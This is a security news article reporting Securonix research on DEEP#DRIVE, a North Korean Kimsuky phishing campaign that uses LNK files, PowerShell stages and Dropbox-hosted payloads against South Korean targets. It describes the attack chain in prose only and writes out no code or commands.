A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors.
The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.
“Leveraging tailored phishing lures written in Korean and disguised as legitimate documents, the attackers successfully infiltrated targeted environments,” security researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker News, describing the activity as a “sophisticated and multi-stage operation.”
The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are disguised as work logs, insurance documents and crypto-related files to trick recipients into opening them, thereby triggering the infection process.
The attack chain is notable for its heavy reliance on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It’s also characterized by the use of Dropbox for payload distribution and data exfiltration.
It all starts with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while stealthily establishing persistence on the Windows host via a scheduled task named “ChromeUpdateTaskMachine.”
One such lure document, written in Korean, pertains to a safety work plan for forklift operations at a logistics facility, delving into the safe handling of heavy cargo and outlining ways to ensure compliance with workplace safety standards.
The PowerShell script is also designed to contact the same Dropbox location to fetch another PowerShell script that’s responsible for gathering and exfiltrating system information. Furthermore, it drops a third PowerShell script that’s ultimately responsible for executing an unknown .NET assembly.
“The use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance data, such as system information and active processes, to predetermined folders,” the researchers said.
“This cloud-based infrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing traditional IP or domain blocklists. Additionally, the infrastructure appeared dynamic and short-lived, as evidenced by the rapid removal of key links after initial stages of the attack, a tactic that not only complicates analysis but also suggests the attackers actively monitor their campaigns for operational security.”
Securonix said it was able to leverage the OAuth tokens to gain additional insights into the threat actor’s infrastructure, finding evidence that the campaign may have been underway since September last year.
“Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.
